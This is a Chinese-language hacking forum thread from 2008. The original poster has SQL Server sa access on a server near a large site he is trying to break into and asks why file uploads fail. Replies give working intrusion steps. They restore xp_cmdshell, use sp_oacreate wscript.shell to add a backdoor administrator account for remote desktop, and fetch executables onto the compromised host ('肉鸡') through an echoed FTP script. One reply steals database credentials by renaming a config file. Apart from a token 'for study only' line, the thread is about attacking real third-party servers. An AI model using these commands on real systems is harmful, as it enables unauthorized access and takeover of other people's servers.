Board logo

标题: [讨论]得到SA权限 但是无法上传文件 [打印本页]
作者: valen886    时间: 2008-7-23 08:37     标题: [讨论]得到SA权限 但是无法上传文件

[讨论]得到SA权限 但是无法上传文件
议题作者:追寻
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

  是这样的,我检测一个大站,实在没办法拿下。于是扫描同网段的站,想尝试ARP欺骗。

用X-SCAN扫到了同一网段下的一个SA,看上去好像是数据库服务器。

  我连接上去,可以执行系统命令,但是怎么都不可以传文件。

  开始以为是被杀毒软件查杀,于是传一个TXT格式文件上去,他提示成功,但是DIR一下,

  还是没成功,尝试一个BAT也不行。

  服务器没有开3389,FTP,我用TFTP到我电脑上,提示超时。

  不知道是不是目录权限问题,传到C:\Documents and Settings目录下也不行,
  
  请问是什么原因呢?


帖子561 精华2 积分4271 阅读权限100 性别男 在线时间525 小时 注册时间2006-9-23 最后登录2008-7-22 查看个人网站
查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

virus-y2k
晶莹剔透§烈日灼然
作者: kklau    时间: 2008-7-23 08:37

沙发...
---------------
其他的先不说..如果是传文件的话.你可以试试下面的方法..
----------------------------------------------
你可以在你本地开共享文件夹..放东西进去.....
然后在肉鸡上..

copy \\IP\文件 加存放地址.

copy \\127.0.0.1\y2k\1.exe c:\1.exe

或者你在他那开个共享文件夹....

试试这个方法..不知道管用不....
帖子42 精华0 积分149 阅读权限40 性别男 在线时间7 小时 注册时间2006-3-24 最后登录2008-1-11 查看详细资料TOP 赚更多的钱

felifan
晶莹剔透§烈日灼然
作者: 伤人    时间: 2008-7-23 08:37

看看它的服务  想下其他方法菜鸟无所谓思想最重要
帖子60 精华0 积分197 阅读权限40 性别男 在线时间49 小时 注册时间2006-5-5 最后登录2008-5-29 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

逗号
晶莹剔透§烈日灼然
作者: 从小早起    时间: 2008-7-23 08:37

xp_cmdshell echo  试过么?
帖子35 精华0 积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22 查看详细资料TOP

beiguancyc
晶莹剔透§烈日灼然
作者: LING    时间: 2008-7-23 08:37

或者对方的权限设置?我有次是发现是sa被降权了
帖子5 精华0 积分20 阅读权限40 性别男 在线时间11 小时 注册时间2007-1-12 最后登录2008-6-28 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

control
晶莹剔透§烈日灼然
作者: zjh7272    时间: 2008-7-23 08:37

这个问题我也常遇到
这个问题一般是权限问题
有的变态管理员确实让人头疼,你说他有技术吧!他搞了个SA!
  可以尝试使用查询分离器连接数据库去恢复一些东西,我这里有个这方面的文章
当sa存储扩展被删除后....sa弱口令相关命令

可不知道大家有无这样的经历?当用sql综合利用工具连接成功后,有的能直接执行命令,创建帐户,



有的执行命令时却遇上下面种种情况而使你辛苦扫得的sa 弱口令失效,功亏一篑~



例如执行命令后回显1:未能找到存储过程"master..xpcmdshell".



回显2:无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)



回显3:拒绝了对对象 "xp_cmdshell"(数据库 "master",所有者 "dbo")的 EXECUTE 权限。



等等可能还有些吧。这几个比较常见。

碰上这种情况,小菜们就变得无所适从了,棰胸跺足,甚至侮辱斯文,臭骂管理员。。。



呵呵,俺认为,回显1,2一般要么是管理员lj,要么是中级菜友的杰作,一般都是可以恢复的shell。回显3可就是经典作品了,把sa的权限降低了,与systemadmin脱离了联系。。。对于这种情况,俺还没有更好的解决办法。(哪位大哥知道麻烦告诉我一声^_^)



下面我就具体演示一下我是怎么对付这样的情况的。

用到的工具:sql查询分离器休闲庄专用版。



怕大家找不到,我把下载地址给大家



SQL查询分析器休闲庄分离版本



http://soft.7747.net/ware/774710/sqlquery.zip



假如我们扫到了:



[219.84.135.161]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]"

[219.84.135.161]: "SQL-Server弱口令"扫描完成, 发现 1.



还开了3389!

先打开sql综合利用工具

连接试试



看,连接成功。



执行命令时,回显



無法載入 DLL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplo.dll,或是參考到某個 DLL 。原因: 126(找不到指定的模組。)。



这个时候,我们就没办法再继续下去了。



下面打开sql查询分离器

登陆进去

出来一个白白的这个。。。

呵呵

哦。

这个ip是开了3389的。

我们先登陆3389看是否成功。

忘记讲了

看。windows2000的server版



好了。我们再在sql查询分离器中输入命令

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net user test 123 /add"

这个命令就是创建一个用户名为test,密码为123的用户,

输入后按F5

我们看到回显有个这个表格样的东东,0。这样的。

这就表示成功了。如果回显“命令成功完成”,反而是没有成功~

呵呵不要上当哦。

下面提升test的权限

输入命令

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net localgroup administrators test /add"



把test提升为管理员



按F5执行命令,回显和刚才一样。。。



下面我们登陆3389

用帐户test

密码123



看能不能登陆,看。。。。

进去了吧。。。

呵呵。。。



***************************************



sa弱口令相关命令



总结的一些关于sa弱口令相关命令.

注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。重要提示!以上提供的方法仅供学习研究!请大家不要进行任何破坏国内主机的违法行为!否则一切后果自负!转载请保留此信息。



一.更改sa口令方法:

用sql综合利用工具连接后,执行命令:

exec sp_password NULL,"新密码","sa"

(提示:慎用!)



二.简单修补sa弱口令.



方法1:查询分离器连接后执行:

if exists (select * from

dbo.sysobjects where id = object_id(N"[dbo].[xp_cmdshell]") and

OBJECTPROPERTY(id, N"IsExtendedProc") = 1)



exec sp_dropextendedproc N"[dbo].[xp_cmdshell]"



GO



然后按F5键命令执行完毕



方法2:查询分离器连接后

第一步执行:use master

第二步执行:sp_dropextendedproc "xp_cmdshell"

然后按F5键命令执行完毕





三.常见情况恢复执行xp_cmdshell.



1 未能找到存储过程"master..xpcmdshell".

  恢复方法:查询分离器连接后,

第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ="xplog70.dll"declare @o int

第二步执行:sp_addextendedproc "xp_cmdshell", "xpsql70.dll"

然后按F5键命令执行完毕



2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)

 恢复方法:查询分离器连接后,

第一步执行:sp_dropextendedproc "xp_cmdshell"

第二步执行:sp_addextendedproc "xp_cmdshell", "xpsql70.dll"

然后按F5键命令执行完毕



3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)

恢复方法:查询分离器连接后,

第一步执行:exec sp_dropextendedproc "xp_cmdshell"

第二步执行:exec sp_addextendedproc "xp_cmdshell","xpweb70.dll"      

然后按F5键命令执行完毕



四.终极方法.

如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:

查询分离器连接后,

2000servser系统:

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add"



declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add"



xp或2003server系统:



declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\windows\system32\cmd.exe /c net user 新用户 密码 /add"



declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add"

当然这个方法不是万能的! 我测试了下十个SA的能成功一两个就算概率大大的了!
  其实方法很多!
  比如楼上的各位兄弟说的开他开了3389了没,开了的话建立个帐户连进去,或者看能不能用批处理上传,或者使用VBS脚本,这个就得尝试了! 反正我是怕怕!哈哈!比较懒- -##..
如果,希望哪位有经验的兄台可以出个高招- -### [s:34]Blog:Www.DayRoad.cn
帖子22 精华2 积分89 阅读权限40 在线时间106 小时 注册时间2007-1-10 最后登录2008-4-21 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

〓陈三太子〓
晶莹剔透§烈日灼然
作者: 车迷    时间: 2008-7-23 08:37

楼主 这种问题我也碰到过  希望那位高手指点
帖子10 精华0 积分28 阅读权限40 性别男 在线时间71 小时 注册时间2006-3-11 最后登录2008-3-22 查看详细资料TOP 让女孩一夜变的更有女人味

追寻
荣誉会员
作者: wrong_sl    时间: 2008-7-23 08:37

引用:
引用第3楼逗号于2007-01-14 20:40发表的:
xp_cmdshell echo  试过么?
怎么弄呢?

帖子561 精华2 积分4271 阅读权限100 性别男 在线时间525 小时 注册时间2006-9-23 最后登录2008-7-22 查看个人网站
查看详细资料TOP

菜白大
荣誉会员
作者: 全仔    时间: 2008-7-23 08:37

echo open ip>>ftp
echo 用户名>>ftp
echo 密码>>ftp
echo get 文件.exe>>ftp
echo bye>>ftp

然后
ftp -s:ftp        姑娘姑娘真可爱         就象冬天的大白菜         每天吃你不例外         不例外来不例外         人人见到人人爱

帖子43 精华0 积分3085 阅读权限100 性别男 来自China 在线时间54 小时 注册时间2004-10-1 最后登录2008-1-11 查看详细资料TOP

find78
晶莹剔透§烈日灼然
作者: asdfghjkl963    时间: 2008-7-23 08:37

有的是因为DLL组件被删除了,不能恢复。
解决方法是:想办法上传DLL组件,然后再用
sp_dropextendedproc "xp_cmdshell"

sp_addextendedproc "xp_cmdshell", "xpsql70.dll"
恢复
帖子10 精华0 积分37 阅读权限40 性别男 在线时间30 小时 注册时间2006-6-25 最后登录2008-7-21 查看详细资料TOP

追寻
荣誉会员
作者: boynow    时间: 2008-7-23 08:37

引用:
引用第10楼find78于2007-01-18 20:48发表的:
有的是因为DLL组件被删除了,不能恢复。
解决方法是:想办法上传DLL组件,然后再用
sp_dropextendedproc "xp_cmdshell"

sp_addextendedproc "xp_cmdshell", "xpsql70.dll"
.......
如果组件被删除了,那为什么还可以执行系统命令,并且已经通过命令成功添加管理员的账号在上面了!

帖子561 精华2 积分4271 阅读权限100 性别男 在线时间525 小时 注册时间2006-9-23 最后登录2008-7-22 查看个人网站
查看详细资料TOP

风云逸剑
晶莹剔透§烈日灼然
作者: 一条虫    时间: 2008-7-23 08:37

这种情况遇到N多....好多都搞不定

前天也遇上了,我找到了数据库联接ASP文件,ren D:\XX.asp  xx.rar 然后 下载下来,找到SA密码。然后才联上去 搞定 
帖子66 精华0 积分212 阅读权限40 性别男 在线时间181 小时 注册时间2006-4-12 最后登录2008-7-18 查看详细资料TOP

remax
晶莹剔透§烈日灼然
作者: 肥鹏    时间: 2008-7-23 08:37

可以执行命令就可以用echo,这就是一个写文件的命令。20字节够写什么?

帖子325 精华2 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料TOP

zczpc2000
晶莹剔透§烈日灼然
作者: 86298688    时间: 2008-7-23 08:37

搞不好SQL是以USER启动的。。~
帖子31 精华0 积分96 阅读权限40 在线时间34 小时 注册时间2005-12-30 最后登录2008-6-28 查看详细资料TOP

zzhcool
晶莹剔透§烈日灼然
作者: pat-k    时间: 2008-7-23 08:37

[quote]引用第5楼control于2007-01-15 22:37发表的:
好了。我们再在sql查询分离器中输入命令

declare @shell int exec sp_oacreate "wscript.shell",@shell output exec sp_oamethod @shell,"run",null,"c:\winnt\system32\cmd.exe /c net user test 123 /add"

这个命令就是创建一个用户名为test,密码为123的用户,

输入后按F5

我们看到回显有个这个表格样的东东,0。这样的。

这就表示成功了。如果回显“命令成功完成”,反而是没有成功~
quote]

我的确实回显“命令成功完成”,那怎么才能执行成功呢?
帖子15 精华2 积分60 阅读权限40 在线时间21 小时 注册时间2006-4-17 最后登录2008-7-20 查看详细资料TOP

h47788568
晶莹剔透§烈日灼然
作者: 一轮不转    时间: 2008-7-23 08:37

用NBSI的二进制能不能传呢?我以前遇到过个,传exe失败.ftp失败,后来用二进制上传就可以了,不过最好小点,嘿嘿,比如下载者=

帖子35 精华0 积分121 阅读权限40 性别男 在线时间133 小时 注册时间2006-9-5 最后登录2008-6-5 查看详细资料TOP

追寻
荣誉会员
作者: 小妖    时间: 2008-7-23 08:37

问题已经解决,谢谢HACKEST,只要用幻影旅团出的个SQL连接就可以上传文件。

[s:34]

帖子561 精华2 积分4271 阅读权限100 性别男 在线时间525 小时 注册时间2006-9-23 最后登录2008-7-22 查看个人网站
查看详细资料TOP

ihack520
晶莹剔透§烈日灼然
作者: b451226    时间: 2008-7-23 08:37

可以试下REN
帖子1 精华0 积分6 阅读权限40 性别男 在线时间1 小时 注册时间2007-12-1 最后登录2008-5-29 查看详细资料TOP

sznicko
晶莹剔透§烈日灼然
作者: 洪记    时间: 2008-7-23 08:37

CMDSHELL。OACREATE都被删也很难传,除非是CMDSHELL删了但没删OACREATE,可以用OACREATE传
帖子9 精华0 积分34 阅读权限40 在线时间19 小时 注册时间2007-4-13 最后登录2008-1-30 查看详细资料TOP

eudx
晶莹剔透§烈日灼然



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2